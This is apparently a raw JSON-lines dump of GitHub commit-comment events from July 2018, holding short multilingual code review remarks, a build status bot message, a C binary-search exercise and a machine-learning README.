{"id":"7986348923","type":"CommitCommentEvent","actor":{"login":"t1meshift"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29758271,"position":null,"line":null,"path":null,"commit_id":"71343d10242447719890dcc1d0d4c74becf41070","created_at":"2018-07-19T01:35:29Z","updated_at":"2018-07-19T01:35:29Z","author_association":"COLLABORATOR","body":"В целом хорошо."}},"created_at":"2018-07-19T01:35:29Z"}
{"id":"7986349266","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758272,"position":44,"line":44,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:35:36Z","updated_at":"2018-07-19T01:35:36Z","author_association":"MEMBER","body":"shouldnt ping individual members of a role. you should quickly make role mentionable, mention and disable mentions\r\n"}},"created_at":"2018-07-19T01:35:36Z"}
{"id":"7986350730","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/source-repo-20180719013600901"},"payload":{"comment":{"id":29758275,"position":1,"line":null,"path":"README.md","commit_id":"c5f865c45ba2c420def5946bc4fba0cdcb4e3574","created_at":"2018-07-19T01:36:10Z","updated_at":"2018-07-19T01:36:10Z","author_association":"OWNER","body":"I am a nice comment"}},"created_at":"2018-07-19T01:36:10Z"}
{"id":"7986351228","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758276,"position":44,"line":44,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:36:22Z","updated_at":"2018-07-19T01:36:22Z","author_association":"MEMBER","body":"need confirmation as well"}},"created_at":"2018-07-19T01:36:22Z"}
{"id":"7986352712","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758280,"position":50,"line":50,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:36:57Z","updated_at":"2018-07-19T01:36:57Z","author_association":"MEMBER","body":"this makes your thing apply globally. people may want to use in different servers.\r\n"}},"created_at":"2018-07-19T01:36:57Z"}
{"id":"7986354322","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758284,"position":null,"line":null,"path":null,"commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T01:37:34Z","updated_at":"2018-07-19T01:37:34Z","author_association":"MEMBER","body":"Please see comments."}},"created_at":"2018-07-19T01:37:34Z"}
{"id":"7986355089","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758286,"position":null,"line":null,"path":null,"commit_id":"2d1352d9897d84a97d737a2581f4cae47a53a9b2","created_at":"2018-07-19T01:37:53Z","updated_at":"2018-07-19T01:37:53Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d1352d9897d84a97d737a2581f4cae47a53a9b2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T01:37:53Z"}
{"id":"7986356327","type":"CommitCommentEvent","actor":{"login":"smgks"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29758289,"position":131,"line":274,"path":"engine.js","commit_id":"71343d10242447719890dcc1d0d4c74becf41070","created_at":"2018-07-19T01:38:22Z","updated_at":"2018-07-19T01:38:22Z","author_association":"COLLABORATOR","body":"У тебя там в апдейте криво было и я не совсем понял че ты хотел, позже зафикшу, там изи"}},"created_at":"2018-07-19T01:38:22Z"}
{"id":"7986358186","type":"CommitCommentEvent","actor":{"login":"utaware"},"repo":{"name":"utaware/Flower"},"payload":{"comment":{"id":29758296,"position":null,"line":null,"path":null,"commit_id":"60dbfffbe83f7bdd9078843419d8216eb204dd7c","created_at":"2018-07-19T01:39:04Z","updated_at":"2018-07-19T01:39:04Z","author_association":"OWNER","body":"github提交出错对于代码进行了一些合并修改"}},"created_at":"2018-07-19T01:39:04Z"}
{"id":"7986359646","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758299,"position":42,"line":47,"path":"main.py","commit_id":"8c132e598107600f3324746a538e7bb6b7eef903","created_at":"2018-07-19T01:39:35Z","updated_at":"2018-07-19T01:39:35Z","author_association":"MEMBER","body":"this is bad practice once again. use a command framework\r\n"}},"created_at":"2018-07-19T01:39:35Z"}
{"id":"7986361445","type":"CommitCommentEvent","actor":{"login":"zhitao654321"},"repo":{"name":"zhitao654321/RSDPNs"},"payload":{"comment":{"id":29758305,"position":2,"line":2,"path":"README.md","commit_id":"08cae6b463ec0b424faf1ffad8a1cd2c9d3692c6","created_at":"2018-07-19T01:40:16Z","updated_at":"2018-07-19T01:40:16Z","author_association":"OWNER","body":"# super-resolution-RSDPNs-tensorflow\r\n ###  tensorflow implementation of super-resolution\r\nMy implemetaion of super-resolution based on dual-path networks but is quit different from orignal networks,the differences are shown as fllowing:\r\n\t\r\n\r\n1. I modifed the structure of the dual-path blocks for faster training speed\r\n\t\r\n\r\n2. I introduced bottleneck to reduce dimension and deconvolution to restore the detail\r\n\r\n3. I introduce the preceptual loss and gram loss based on feature space of VGG19 \r\n ###  Dependencies:\r\ntensorflow >=1.3.0\r\nScipy >= 0.18\r\n ###  Usage:\r\nFor testing:\r\nOpen main.py,change the data path to your data, and excute it.The result will be saved at sample directory.\r\nFor training:\r\nPut your own dataset into Train directory,open main.py and turn is_train as Ture.\r\n ###  Result:\r\nAfter training 100 epochs on 120 images, the networks can be well trained and generate the high resolution image. It takes about 7 hours to train the model,and both training and testing are preformed on single NIVIDA 1080ti GPU.Empirically,i set the initial learning rate 0.0001 and set the decay rate 0.98 with every 1000 steps.the results are shown as following. \r\n\r\n"}},"created_at":"2018-07-19T01:40:16Z"}
{"id":"7986363020","type":"CommitCommentEvent","actor":{"login":"Alexstrowski"},"repo":{"name":"Alexstrowski/udemy-heroes"},"payload":{"comment":{"id":29758312,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-19T01:40:51Z","updated_at":"2018-07-19T01:40:51Z","author_association":"OWNER","body":"## Joker\r\nEste es mi villano favorito"}},"created_at":"2018-07-19T01:40:51Z"}
{"id":"7986363131","type":"CommitCommentEvent","actor":{"login":"jedbrooke"},"repo":{"name":"Cythirixs/CLIPCO-Website"},"payload":{"comment":{"id":29758313,"position":null,"line":null,"path":null,"commit_id":"00fb95c3bad32f448c31071026af43c836dd48d0","created_at":"2018-07-19T01:40:54Z","updated_at":"2018-07-19T01:40:54Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Remove the images from the Prizes table - and replace with text: Direct Give Contest Prizes for 2018-2019 To Be Announced http://www.cusdclipco.org/direct_give.html](https://trello.com/c/oGVORaI9/7-remove-the-images-from-the-prizes-table-and-replace-with-text-direct-give-contest-prizes-for-2018-2019-to-be-announced-http-wwwc)"}},"created_at":"2018-07-19T01:40:54Z"}
{"id":"7986363720","type":"CommitCommentEvent","actor":{"login":"Alexstrowski"},"repo":{"name":"Alexstrowski/udemy-heroes"},"payload":{"comment":{"id":29758315,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-19T01:41:07Z","updated_at":"2018-07-19T01:41:07Z","author_association":"OWNER","body":"Joker es mi villano favorito"}},"created_at":"2018-07-19T01:41:07Z"}
{"id":"7986365848","type":"CommitCommentEvent","actor":{"login":"timdorr"},"repo":{"name":"timdorr/model-s-api"},"payload":{"comment":{"id":29758320,"position":null,"line":null,"path":null,"commit_id":"f346481daf1c24eb24884f655fe99e9e4a9f1e5a","created_at":"2018-07-19T01:41:54Z","updated_at":"2018-07-19T01:41:54Z","author_association":"OWNER","body":"__API Description file syntax error on line 134__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-19T01:41:54Z"}
{"id":"7986367061","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29758322,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T01:42:22Z","updated_at":"2018-07-19T01:42:22Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-19T01:42:22Z"}
{"id":"7986369467","type":"CommitCommentEvent","actor":{"login":"jedbrooke"},"repo":{"name":"Cythirixs/CLIPCO-Website"},"payload":{"comment":{"id":29758327,"position":null,"line":null,"path":null,"commit_id":"00fb95c3bad32f448c31071026af43c836dd48d0","created_at":"2018-07-19T01:43:13Z","updated_at":"2018-07-19T01:43:13Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update Direct Give Competition webpage with new numbers http://www.cusdclipco.org/direct_give.html](https://trello.com/c/vhESLFcx/4-update-direct-give-competition-webpage-with-new-numbers-http-wwwcusdclipcoorg-directgivehtml)"}},"created_at":"2018-07-19T01:43:13Z"}
{"id":"7986370246","type":"CommitCommentEvent","actor":{"login":"bryankim96"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758329,"position":null,"line":null,"path":null,"commit_id":"70a6ac30892e9301672d28e4d2b92d0d393fb6a4","created_at":"2018-07-19T01:43:32Z","updated_at":"2018-07-19T01:43:32Z","author_association":"COLLABORATOR","body":"I feel like this could potentially be useful if the user wants to verify that the config file was parsed correctly. Parsing errors/minor formatting mistakes in the config file seem a likely source of non-obvious errors and this makes the debug mode actually useful for catching them."}},"created_at":"2018-07-19T01:43:32Z"}
{"id":"7986371956","type":"CommitCommentEvent","actor":{"login":"Fripplebubby"},"repo":{"name":"JumboCode/PeopleMakingADifference"},"payload":{"comment":{"id":29758334,"position":22,"line":11,"path":"Backend/routes/get_root.js","commit_id":"bb3987ad57ffda384382e69c975a3b6b2ae9d790","created_at":"2018-07-19T01:44:10Z","updated_at":"2018-07-19T01:44:10Z","author_association":"COLLABORATOR","body":"big tabs much"}},"created_at":"2018-07-19T01:44:10Z"}
{"id":"7986373577","type":"CommitCommentEvent","actor":{"login":"edysegura"},"repo":{"name":"sandrooliveira/advanced-css-course"},"payload":{"comment":{"id":29758338,"position":null,"line":null,"path":null,"commit_id":"f17a210e674ab4798a1920b15de4349daedf33d2","created_at":"2018-07-19T01:44:47Z","updated_at":"2018-07-19T01:44:47Z","author_association":"NONE","body":"Keep it up @sandrooliveira!!! Let's support each other in other to dominate all kind of front-end development!!"}},"created_at":"2018-07-19T01:44:47Z"}
{"id":"7986375288","type":"CommitCommentEvent","actor":{"login":"Fripplebubby"},"repo":{"name":"JumboCode/PeopleMakingADifference"},"payload":{"comment":{"id":29758345,"position":27,"line":16,"path":"Backend/routes/get_root.js","commit_id":"bb3987ad57ffda384382e69c975a3b6b2ae9d790","created_at":"2018-07-19T01:45:26Z","updated_at":"2018-07-19T01:45:26Z","author_association":"COLLABORATOR","body":"send json please"}},"created_at":"2018-07-19T01:45:26Z"}
{"id":"7986376125","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"path1380/FEM_Parth"},"payload":{"comment":{"id":29758347,"position":42,"line":269,"path":"src/local_mat.f90","commit_id":"046adf71f5bfed549cf89ba39d101ad8eb6e221d","created_at":"2018-07-19T01:45:46Z","updated_at":"2018-07-19T01:45:46Z","author_association":"COLLABORATOR","body":"Oops, I missed which subroutine this was in. The usual thing is to implement MatGetDiagonal for your MatShell, then use `-pc_type jacobi`. For the mass matrix, you can use the lumped diagonal obtained by `-pc_type jacobi -pc_jacobi_type rowsum` and don't need to implement anything beyond MatMult."}},"created_at":"2018-07-19T01:45:46Z"}
{"id":"7986382676","type":"CommitCommentEvent","actor":{"login":"Anthony-Glatt"},"repo":{"name":"Anthony-Glatt/Projects"},"payload":{"comment":{"id":29758354,"position":null,"line":null,"path":null,"commit_id":"482868409d63c36a0ecbe6d003293a7ab089674f","created_at":"2018-07-19T01:48:14Z","updated_at":"2018-07-19T01:48:14Z","author_association":"OWNER","body":"Oh smart idea! I will give that a go. Hope you ordered some yummy pizza :)\n\nOn Wed, Jul 18, 2018, 5:49 PM Dennis Sauve <notifications@github.com> wrote:\n\n> @Anthony-Glatt <https://github.com/Anthony-Glatt> if your goal is to\n> center the cart, try setting margin-left to auto instead of 325px, and then\n> set margin-right to auto as well.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Anthony-Glatt/Projects/commit/482868409d63c36a0ecbe6d003293a7ab089674f#commitcomment-29757969>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am6jBn9XDoeKMZXRhGSXSXXuqyA7FYJ7ks5uH9eFgaJpZM4VVlPL>\n> .\n>\n"}},"created_at":"2018-07-19T01:48:14Z"}
{"id":"7986383699","type":"CommitCommentEvent","actor":{"login":"RespectTang"},"repo":{"name":"RespectTang/text001"},"payload":{"comment":{"id":29758360,"position":167,"line":167,"path":"二分法","commit_id":"ee0941094b5dfbecfec5066137ef1edc3e0000ef","created_at":"2018-07-19T01:48:38Z","updated_at":"2018-07-19T01:48:38Z","author_association":"OWNER","body":"/*\r\n6.折半查找 (20分) \r\n题目内容：\r\n折半查找是对有序表进行快速查找的一种方法，通过一次比较能减少一半的比较区域。\r\n输入描述\r\n在第一行输入数据元素个数n，第二行输入n个数据，在第三行输入待查数据\r\n输出描述\r\n查找成功输出\"YES\"，然后输出查找次数；若查找失败则输出\"NO\"，后输出查找次数。\r\n输入样例\r\n5\r\n1 3 5 6 8\r\n6\r\n输出样例 \r\nYES 2\r\n*/ \r\n#include<stdio.h>\r\n\r\n /*int fun(int m[],int n,int x)\r\n {\r\n \tint i=0,left,right,mid;\r\n \tleft=0;\r\n \tright=n-1;\r\n \t\r\n \twhile(left<=right)\r\n \t{\r\n \t\tmid=(left+right)/2;\r\n\t \ti++;\r\n \t\tif(x>m[mid])\r\n \t\t{\r\n \t\t\tleft=mid+1;\r\n\t\t}\r\n\t\telse if(x<m[mid])\r\n\t\t{\r\n\t\t\tright=mid-1;\r\n\t\t}\r\n\t\telse if(x==m[mid])\r\n\t\t{\r\n\t\t\tprintf(\"YES %d\",i);\r\n\t\t\tbreak; \r\n\t\t}\r\n\t\r\n \t}\r\n \twhile(left>right)\r\n\t {\r\n \t\tprintf(\"NO %d\",i);\r\n \t\tbreak;\r\n\t }\r\n \t\r\n }*/\r\n\r\n\r\n int main()\r\n {\r\n \tint n,i,m[100],x,left,right,mid;\r\n \tscanf(\"%d\",&n);\r\n \tfor(i=0;i<n;i++)\r\n \t{\r\n \t\tscanf(\"%d\",&m[i]);\r\n\t}\r\n\tscanf(\"%d\",&x);\r\n \r\n \r\n  \ti=0;\r\n \tleft=0;\r\n \tright=n-1;\r\n \t\r\n \twhile(left<=right)\r\n \t{\r\n \t\tmid=(left+right)/2;\r\n\t \ti++;\r\n \t\tif(x>m[mid])\r\n \t\t{\r\n \t\t\tleft=mid+1;\r\n\t\t}\r\n\t\telse if(x<m[mid])\r\n\t\t{\r\n\t\t\tright=mid-1;\r\n\t\t}\r\n\t\telse if(x==m[mid])\r\n\t\t{\r\n\t\t\tprintf(\"YES %d\",i);\r\n\t\t\tbreak; \r\n\t\t}\r\n\t\r\n \t}\r\n \twhile(left>right)\r\n\t {\r\n \t\tprintf(\"NO %d\",i);\r\n \t\tbreak;\r\n\t }\r\n \t\r\n \t\r\n \treturn 0;\r\n }  \r\n\r\n \r\n"}},"created_at":"2018-07-19T01:48:38Z"}
{"id":"7986385357","type":"CommitCommentEvent","actor":{"login":"RespectTang"},"repo":{"name":"RespectTang/text001"},"payload":{"comment":{"id":29758367,"position":null,"line":null,"path":null,"commit_id":"ee0941094b5dfbecfec5066137ef1edc3e0000ef","created_at":"2018-07-19T01:49:19Z","updated_at":"2018-07-19T01:49:19Z","author_association":"OWNER","body":"经典二分"}},"created_at":"2018-07-19T01:49:19Z"}
{"id":"7986387976","type":"CommitCommentEvent","actor":{"login":"autozimu"},"repo":{"name":"ncm2/ncm2_lsp_snippet"},"payload":{"comment":{"id":29758372,"position":31,"line":30,"path":"utils.py","commit_id":"095569725ba2aca2baaa846d2476ff3cd2eca8f4","created_at":"2018-07-19T01:50:20Z","updated_at":"2018-07-19T01:50:20Z","author_association":"NONE","body":"Since you're already depending on LanguageClient-neovim for getting additional text edits, you may want to use LanguageClient-neovim for apply those edits too. There is an existing [function] for applying those edits.\r\n\r\n[function]: https://github.com/autozimu/LanguageClient-neovim/blob/736bbdfa1397bc226e78781e094ad3c697c246e2/autoload/LanguageClient.vim#L873\r\n\r\nLet me know if you has any question using this API."}},"created_at":"2018-07-19T01:50:20Z"}
{"id":"7986388238","type":"CommitCommentEvent","actor":{"login":"alothaimeen"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29758373,"position":null,"line":null,"path":null,"commit_id":"8fae046f71ed6be3756f2abb1b5452fbeb5a5618","created_at":"2018-07-19T01:50:26Z","updated_at":"2018-07-19T01:50:26Z","author_association":"NONE","body":"didn't need it"}},"created_at":"2018-07-19T01:50:26Z"}
{"id":"7986388473","type":"CommitCommentEvent","actor":{"login":"bryankim96"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758376,"position":null,"line":null,"path":null,"commit_id":"4e46949e075747d045bd07ca5fe603d15d62a564","created_at":"2018-07-19T01:50:30Z","updated_at":"2018-07-19T01:50:30Z","author_association":"COLLABORATOR","body":"If the intention of the defaults is to leave the data unchanged, should apply_processing be False by default (rather than applying processing, but having it do nothing)? Then the defaults for parameters to DataProcessor could be set to values that seem like reasonable defaults _in the case that processing is being applied_ (basically the typical settings that we might use in our runs)."}},"created_at":"2018-07-19T01:50:30Z"}
{"id":"7986391933","type":"CommitCommentEvent","actor":{"login":"zhouhonghui"},"repo":{"name":"zhouhonghui/test"},"payload":{"comment":{"id":29758380,"position":null,"line":null,"path":null,"commit_id":"0f5b16b8903d9a1e1361b56161cad56df432fd9f","created_at":"2018-07-19T01:51:49Z","updated_at":"2018-07-19T01:51:49Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-19T01:51:49Z"}
{"id":"7986393415","type":"CommitCommentEvent","actor":{"login":"zhouhonghui"},"repo":{"name":"zhouhonghui/test"},"payload":{"comment":{"id":29758382,"position":null,"line":null,"path":null,"commit_id":"0f5b16b8903d9a1e1361b56161cad56df432fd9f","created_at":"2018-07-19T01:52:24Z","updated_at":"2018-07-19T01:52:24Z","author_association":"OWNER","body":"# ok very good"}},"created_at":"2018-07-19T01:52:24Z"}
{"id":"7986399128","type":"CommitCommentEvent","actor":{"login":"aribrill"},"repo":{"name":"ctlearn-project/ctlearn"},"payload":{"comment":{"id":29758389,"position":null,"line":null,"path":null,"commit_id":"70a6ac30892e9301672d28e4d2b92d0d393fb6a4","created_at":"2018-07-19T01:54:29Z","updated_at":"2018-07-19T01:54:29Z","author_association":"COLLABORATOR","body":"Doesn't the copy of the config saved to the model directory already provide\nthis functionality?\n\nOn Wed, Jul 18, 2018 at 9:43 PM Bryan Kim <notifications@github.com> wrote:\n\n> I feel like this could potentially be useful if the user wants to verify\n> that the config file was parsed correctly. Parsing errors/minor formatting\n> mistakes in the config file seem a likely source of non-obvious errors and\n> this makes the debug mode actually useful for catching them.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ctlearn-project/ctlearn/commit/70a6ac30892e9301672d28e4d2b92d0d393fb6a4#commitcomment-29758329>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASyVnV62rT95jitcxFjHQLdV6mRt4zwuks5uH-REgaJpZM4VVnsp>\n> .\n>\n"}},"created_at":"2018-07-19T01:54:29Z"}
{"id":"7986404979","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29758396,"position":288,"line":288,"path":"lib/node_modules/@stdlib/stats/incr/mvmr/test/test.js","commit_id":"b331e5634fe726ff0e16e87814ac3f85d8164d31","created_at":"2018-07-19T01:56:42Z","updated_at":"2018-07-19T01:56:42Z","author_association":"MEMBER","body":"\"always may not return\" sounds a bit odd to me. What about dropping the \"always\"?"}},"created_at":"2018-07-19T01:56:42Z"}
{"id":"7986407069","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29758400,"position":13,"line":21,"path":"autoload.php","commit_id":"50a61d2d1fa704c7b2b79226c94f86f5bbd4fd81","created_at":"2018-07-19T01:57:30Z","updated_at":"2018-07-19T01:57:30Z","author_association":"CONTRIBUTOR","body":"I get started with thinking about the defined variable approach.\r\nI look at many codes in this repository are used the camel-case.\r\nBut this `autoload.php` I create is used the underline-based.\r\nI think I need to make them consistent.\r\n\r\nWhat do you think? Thanks."}},"created_at":"2018-07-19T01:57:30Z"}
{"id":"7986409620","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29758403,"position":null,"line":null,"path":null,"commit_id":"c024298b7b51d76155a70fcff1dd74770c658d51","created_at":"2018-07-19T01:58:23Z","updated_at":"2018-07-19T01:58:23Z","author_association":"CONTRIBUTOR","body":"singleplayer, ALPHA-27\r\nit's strange, but knights (GT_LVL=4 KNIGHT_LVL=3-4) even doesn't request shield, but wears if i give them.\r\nthere's a sneaky bug somewhere, maybe even not in this code :)"}},"created_at":"2018-07-19T01:58:23Z"}
{"id":"7986410336","type":"CommitCommentEvent","actor":{"login":"benz11260"},"repo":{"name":"benz11260/Seagate-iBenz"},"payload":{"comment":{"id":29758405,"position":null,"line":null,"path":null,"commit_id":"86c24b2446c330b429ce6364cfa9c73d6223dc60","created_at":"2018-07-19T01:58:36Z","updated_at":"2018-07-19T01:58:36Z","author_association":"OWNER","body":"[LICENSE.txt](https://github.com/benz11260/Seagate-iBenz/files/2207914/LICENSE.txt)\r\n"}},"created_at":"2018-07-19T01:58:36Z"}
{"id":"7986411115","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29758406,"position":51,"line":51,"path":"lib/node_modules/@stdlib/stats/incr/mvmr/README.md","commit_id":"b331e5634fe726ff0e16e87814ac3f85d8164d31","created_at":"2018-07-19T01:58:53Z","updated_at":"2018-07-19T01:58:53Z","author_association":"MEMBER","body":"This must be intentional, but I am still wondering why you use `F` in this package as a variable name for the VMR, whereas the non-windowed version uses `D`?"}},"created_at":"2018-07-19T01:58:53Z"}
{"id":"7986412907","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/dumbflower"},"payload":{"comment":{"id":29758409,"position":6,"line":4,"path":".gitignore","commit_id":"fe1dbfc0ffbc2abaa46d34574c5c2e446337788f","created_at":"2018-07-19T01:59:31Z","updated_at":"2018-07-19T01:59:31Z","author_association":"COLLABORATOR","body":"What's that?! It seems that you have to solve the conflicts before using the `git push` command.\r\nAfter using the `git pull` command, you have to solve the conflicts."}},"created_at":"2018-07-19T01:59:31Z"}
{"id":"7986413702","type":"CommitCommentEvent","actor":{"login":"rencauying"},"repo":{"name":"kdchang/reactjs101"},"payload":{"comment":{"id":29758413,"position":7,"line":8,"path":"Appendix01/README.md","commit_id":"e79d3c9629f351878a0366d709dc187a8e7151c6","created_at":"2018-07-19T01:59:48Z","updated_at":"2018-07-19T01:59:48Z","author_association":"NONE","body":"aaadf"}},"created_at":"2018-07-19T01:59:48Z"}
{"id":"7988138823","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762111,"position":34,"line":34,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:01:14Z","updated_at":"2018-07-19T10:01:14Z","author_association":"NONE","body":"`catalog__wrapper` пока убирай \r\nкогда будем стилизовать - добавим если надо"}},"created_at":"2018-07-19T10:01:14Z"}
{"id":"7988141300","type":"CommitCommentEvent","actor":{"login":"eharperink"},"repo":{"name":"eharperink/leviaan2"},"payload":{"comment":{"id":29762114,"position":null,"line":null,"path":null,"commit_id":"02f7920509743c807639b6989cf1b0c93952b398","created_at":"2018-07-19T10:01:41Z","updated_at":"2018-07-19T10:01:41Z","author_association":"OWNER","body":"bla bla\r\n![i r _baboon](https://user-images.githubusercontent.com/365094/42936063-739323d8-8b4b-11e8-9ec7-877d0e17427c.gif)\r\n"}},"created_at":"2018-07-19T10:01:41Z"}
{"id":"7988142465","type":"CommitCommentEvent","actor":{"login":"lll000111"},"repo":{"name":"facebook/flow"},"payload":{"comment":{"id":29762115,"position":null,"line":null,"path":null,"commit_id":"b313b5ed35f5e03cb8233ca447a235b63be3d46d","created_at":"2018-07-19T10:01:55Z","updated_at":"2018-07-19T10:01:55Z","author_association":"CONTRIBUTOR","body":"The Table of Contents of that page was not updated..."}},"created_at":"2018-07-19T10:01:55Z"}
{"id":"7988144659","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762121,"position":39,"line":39,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:02:19Z","updated_at":"2018-07-19T10:02:19Z","author_association":"NONE","body":"`catalog__link-title` можно просто `item__title`"}},"created_at":"2018-07-19T10:02:19Z"}
{"id":"7988144794","type":"CommitCommentEvent","actor":{"login":"nicjhan"},"repo":{"name":"OceansAus/cice5"},"payload":{"comment":{"id":29762124,"position":null,"line":null,"path":null,"commit_id":"8e87f0a6e9879bacd09e4dfc33b1ce860bea88e3","created_at":"2018-07-19T10:02:21Z","updated_at":"2018-07-19T10:02:21Z","author_association":"CONTRIBUTOR","body":"Thanks for looking at this @russfiedler. This was max_blocks originally, I then changed it to nblocks but then found that this necessitated a large number of other code changes. It seems that max_blocks is used to declare arrays throughout the model. "}},"created_at":"2018-07-19T10:02:21Z"}
{"id":"7988146809","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762129,"position":41,"line":41,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:02:43Z","updated_at":"2018-07-19T10:02:43Z","author_association":"NONE","body":"`catalog__item-amount` -> `item__amount`"}},"created_at":"2018-07-19T10:02:43Z"}
{"id":"7988149365","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29762132,"position":21,"line":21,"path":"Lesson5HW/src/main/java/ru/otus/lesson5hw/shell/StartCommands.java","commit_id":"90a399cd321cffdabadd9f3f751d9492049e848c","created_at":"2018-07-19T10:03:11Z","updated_at":"2018-07-19T10:03:11Z","author_association":"NONE","body":"Нормально)"}},"created_at":"2018-07-19T10:03:11Z"}
{"id":"7988149606","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762134,"position":42,"line":42,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:03:14Z","updated_at":"2018-07-19T10:03:14Z","author_association":"NONE","body":"`amount__title` -> `item__amount-title`"}},"created_at":"2018-07-19T10:03:14Z"}
{"id":"7988150194","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29762137,"position":19,"line":19,"path":"Lesson5HW/src/test/java/ru/otus/lesson5hw/AppTest.java","commit_id":"90a399cd321cffdabadd9f3f751d9492049e848c","created_at":"2018-07-19T10:03:20Z","updated_at":"2018-07-19T10:03:20Z","author_association":"NONE","body":"Крутяк!"}},"created_at":"2018-07-19T10:03:20Z"}
{"id":"7988153630","type":"CommitCommentEvent","actor":{"login":"ericholscher"},"repo":{"name":"rtfd/readthedocs.org"},"payload":{"comment":{"id":29762142,"position":7,"line":20,"path":"readthedocs/projects/signals.py","commit_id":"ce4abaf9324f493a37b2549dce55dc4952228ad1","created_at":"2018-07-19T10:03:59Z","updated_at":"2018-07-19T10:03:59Z","author_association":"MEMBER","body":"Is there a reason to use signals here? I think we can just put the logic directly in the build process? These feel too specific to be useful as signals, unless there is some other reason we need them? "}},"created_at":"2018-07-19T10:03:59Z"}
{"id":"7988153828","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762143,"position":43,"line":43,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T10:04:01Z","updated_at":"2018-07-19T10:04:01Z","author_association":"NONE","body":"`amount` -> `item__amount-num`"}},"created_at":"2018-07-19T10:04:01Z"}
